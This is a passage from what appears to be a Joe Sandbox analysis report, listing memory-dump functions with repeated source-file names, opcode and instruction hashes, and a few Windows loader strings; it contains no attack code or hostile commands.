                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                    • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                                                                    • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                    • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                                                                    Function 009AFB50 Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                    • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                    • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                    • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                    Function 009AFC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                    Function 009AFC30 Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                    • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                                                                    • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                    • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                                                                    Function 009AFC48 Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                    • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                                    • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                    • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                                    Function 009AFC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                    Function 009AFD8C Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                    Function 009B1D80 Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                    • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                                    • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                    • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                                    Function 009AFD5C Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                    • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                    • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                    • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                    Function 009AFEA0 Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                    Function 009AFED0 Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                    Function 009AFE24 Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                    • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                    • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                    • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                    Function 009AFFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                    Function 009AFFFC Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                    • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                    • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                    • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                    Function 009AFF34 Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                    • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                                    • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                    • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                                    Function 009D8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • WindowsExcludedProcs, xrefs: 009D87C1
                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 009D87E6
                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 009D8827
                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 009D89FC
                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 009D8914
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcspbrk
                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                    • API String ID: 402402107-258546922
                                                                                                    • Opcode ID: c617d64167836f66e7a952a519cc0c581d2b1e3a9657cf415f6c0cd5eaf48fa2
                                                                                                    • Instruction ID: ccf759fb3fab3d8deeadae8e4cf0ffc87af4c02193143b37661f0ab6ba7bf519
                                                                                                    • Opcode Fuzzy Hash: c617d64167836f66e7a952a519cc0c581d2b1e3a9657cf415f6c0cd5eaf48fa2
                                                                                                    • Instruction Fuzzy Hash: 74F1F7B1D40209EFCF11EF95CA81EEEB7B8FF58310F14846AE505A7211EB359A45DB60
                                                                                                    Function 00A4822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
